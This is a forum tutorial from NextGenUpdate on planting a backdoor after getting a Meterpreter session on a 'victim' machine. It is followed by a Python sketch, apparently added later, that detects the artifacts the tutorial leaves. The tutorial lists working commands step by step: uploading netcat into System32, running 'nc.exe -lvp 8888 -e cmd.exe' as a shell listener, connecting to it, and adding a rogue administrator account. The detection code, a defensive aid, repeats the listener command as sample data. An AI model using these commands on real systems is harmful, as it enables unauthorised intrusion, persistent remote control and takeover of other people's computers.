Post: Hacking with a Meterpreter session
11-11-2010, 08:10 PM #1
VipVince
Save Point
Ok, I am making this tut assuming you have managed to get a Meterpreter session on your victim's computer (if you don't know what this is, g00glez it). Today we will be uploading Netcat on the victim's computer, executing it, and having it listen on a certain port which we will connect to. Netcat will basically be playing the role of a backdoor on the exploited system.

First off, when you get a Meterpreter session, type sessions -i 1, to begin interaction with the target computer.

Now time to upload Netcat on the victim's system. First locate nc.exe in your Backtrack, it's in /pentest/windows_binaries/tools, copy it from there and put it on your desktop (in Backtrack desktop is known as root). Once you have done that, type upload /root/nc.exe C:\\Windows\\System32\\nc.exe, if successful you will get a prompt like below.

So that's Netcat uploaded on the victim's computer.

Now let's get into the command prompt of the victim, type execute -f cmd.exe -H -i, if successful you will basically be in your victim's directory and ready to issue commands.

Now let's execute Netcat on the victim's computer, and have it running on port 8888 for us to connect to, this is Netcat playing the role of a backdoor. Type nc.exe -lvp 8888 -e cmd.exe, if successful it will tell you that Netcat is waiting for a connection.

Success, now open a new shell, and run Netcat, we will basically be attempting to connect to the victim on port 8888, which we have Netcat listening on. To do this type nc -vv (VictimsIP) 8888 (which is the port number).

Voila, we are in. We can browse through the victim's directories by typing dir.

Now if we type cd \ then net user, we will see the admin and other accounts on the victim's machine.

Time for the fun part, let's create our own account on the hacked system, type net user vipvince pwned/add (change vipvince to your desired username, and pwned to your desired password), and to add an Administrator account on the system type, net user localgroup administrators vipvince pwned /add.

There you go, so from our Meterpreter session we have created a backdoor via Netcat, and added an Administrator account on the hacked machine.

Printscreen from the hacked computer
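
Added example, not part of the original post: a small detection sketch for the three host artifacts the walkthrough above leaves behind (nc.exe dropped in System32, a listener started with -e cmd.exe, and a freshly created account added to Administrators). The event records are constructed samples with simplified, assumed field names modelled on Windows Security event IDs 4688, 4720 and 4732; the rule names are hypothetical.

```python
import re

# Constructed sample events using simplified field names (assumption), modelled on
# Windows Security log IDs: 4688 process creation, 4720 account created,
# 4732 member added to a local group.
SAMPLE_EVENTS = [
    {"id": 4688, "host": "WS01", "image": r"C:\Windows\System32\nc.exe",
     "cmdline": "nc.exe -lvp 8888 -e cmd.exe"},
    {"id": 4688, "host": "WS01", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net user"},
    {"id": 4720, "host": "WS01", "target": "vipvince"},
    {"id": 4732, "host": "WS01", "target": "vipvince", "group": "Administrators"},
    {"id": 4688, "host": "WS02", "image": r"C:\Windows\System32\PING.EXE",
     "cmdline": "ping 10.0.0.1"},
    {"id": 4732, "host": "WS02", "target": "helpdesk", "group": "Administrators"},
]

LISTEN = re.compile(r"\s-[a-z]*l[a-z]*\b", re.I)  # -l, -lvp, -nlvp ...
EXEC_SHELL = re.compile(r"\s-e\s+\S*(cmd|powershell)(\.exe)?\b", re.I)
NETCAT_NAMES = {"nc.exe", "ncat.exe", "netcat.exe"}

def detect(events):
    """Return (host, rule) alerts for the three artifacts the post leaves behind."""
    alerts, created = [], set()
    for ev in events:
        host = ev["host"]
        if ev["id"] == 4688:
            cmd, image = ev.get("cmdline", ""), ev.get("image", "").lower()
            if LISTEN.search(cmd) and EXEC_SHELL.search(cmd):
                alerts.append((host, "listener-bound-to-shell"))
            if image.rsplit("\\", 1)[-1] in NETCAT_NAMES and "\\windows\\system32\\" in image:
                alerts.append((host, "netcat-binary-in-system32"))
        elif ev["id"] == 4720:
            created.add((host, ev["target"].lower()))
        elif ev["id"] == 4732 and ev["group"].lower() == "administrators":
            # Only escalate when the account was also created in this event window.
            if (host, ev["target"].lower()) in created:
                alerts.append((host, "new-account-added-to-administrators"))
    return alerts

if __name__ == "__main__":
    for host, rule in detect(SAMPLE_EVENTS):
        print(host, rule)
```

The account rule correlates creation with the group change, so a long-standing account added to Administrators (the WS02 sample) is left for a separate, lower-severity rule.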

Copyright © 2024, NextGenUpdate.
All Rights Reserved.